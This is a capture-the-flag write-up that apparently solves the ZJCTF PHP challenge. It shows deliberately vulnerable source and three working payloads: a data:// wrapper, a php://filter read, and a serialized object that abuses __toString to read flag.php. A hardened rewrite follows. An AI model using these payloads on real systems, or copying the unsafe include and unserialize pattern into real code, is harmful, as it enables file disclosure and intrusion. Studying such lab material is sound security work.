<?php
$text = $_GET["text"];
$file = $_GET["file"];
$password = $_GET["password"];
// $text goes straight into file_get_contents(), so it may be a stream-wrapper URL
if (isset($text) && (file_get_contents($text, 'r') === "welcome to the zjctf")) {
    echo "<br><h1>" . file_get_contents($text, 'r') . "</h1></br>";
    // only the literal substring "flag" in $file is rejected
    if (preg_match("/flag/", $file)) {
        echo "Not now!";
        exit();
    } else {
        include($file); //useless.php
        // request data is unserialized, then echoed (string conversion)
        $password = unserialize($password);
        echo $password;
    }
}
else {
    highlight_file(__FILE__);
}
?>
?text=data://text/plain,welcome to the zjctf
?text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=
file=php://filter/convert.base64-encode/resource=useless.php
<?php
class Flag { //flag.php
    public $file;
    // called whenever a Flag object is converted to a string, e.g. by echo
    public function __tostring() {
        if (isset($this->file)) {
            echo file_get_contents($this->file);
            echo "<br>";
            return ("U R SO CLOSE !///COME ON PLZ");
        }
    }
}
?>
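This defines a class Flag that contains the magic method __tostring(). Analysing the method shows that if the $file property is set, the file it names is read and its contents are output.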
O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}
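For contrast with the challenge source, here is an added example (not part of the original challenge or write-up) that handles the same three parameters without handing any of them to a stream wrapper, to include() as a path, or to class-instantiating unserialize(). The ALLOWED_PAGES map and the helper names are hypothetical; the inputs at the bottom are the payloads shown above plus one constructed benign request.

```php
<?php
// Added example, not the challenge's code. ALLOWED_PAGES and the helper
// names are hypothetical; parameter names follow the challenge source.
const ALLOWED_PAGES = ['useless' => __DIR__ . '/useless.php'];

function read_greeting(?string $text): ?string
{
    // Compare the parameter as a plain string. It is never passed to
    // file_get_contents(), so a data:// URL cannot supply the content.
    return $text === 'welcome to the zjctf' ? $text : null;
}

function resolve_page(?string $file): ?string
{
    // The parameter is only a key into a fixed map. A value carrying a
    // scheme (php://filter/...) or a path is not a key and resolves to null.
    return ALLOWED_PAGES[$file ?? ''] ?? null;
}

function parse_password(?string $password): ?string
{
    if ($password === null) {
        return null;
    }
    // allowed_classes => false makes unserialize() build
    // __PHP_Incomplete_Class instead of Flag, so Flag::__toString()
    // cannot be reached from request data.
    $value = @unserialize($password, ['allowed_classes' => false]);
    return is_string($value) ? $value : null;
}

// Constructed inputs: the write-up's three payloads, then a benign request.
$cases = [
    ['data://text/plain,welcome to the zjctf',
     'php://filter/convert.base64-encode/resource=useless.php',
     'O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}'],
    ['welcome to the zjctf', 'useless', serialize('s3cret')],
];
foreach ($cases as [$text, $file, $password]) {
    printf("text=%s file=%s password=%s\n",
        var_export(read_greeting($text) !== null, true),
        var_export(resolve_page($file) !== null, true),
        var_export(parse_password($password), true));
}
```

The preg_match("/flag/") check in the original is a deny-list on one substring, which is why the php://filter read of useless.php passes it; the key lookup here rejects everything that is not explicitly listed.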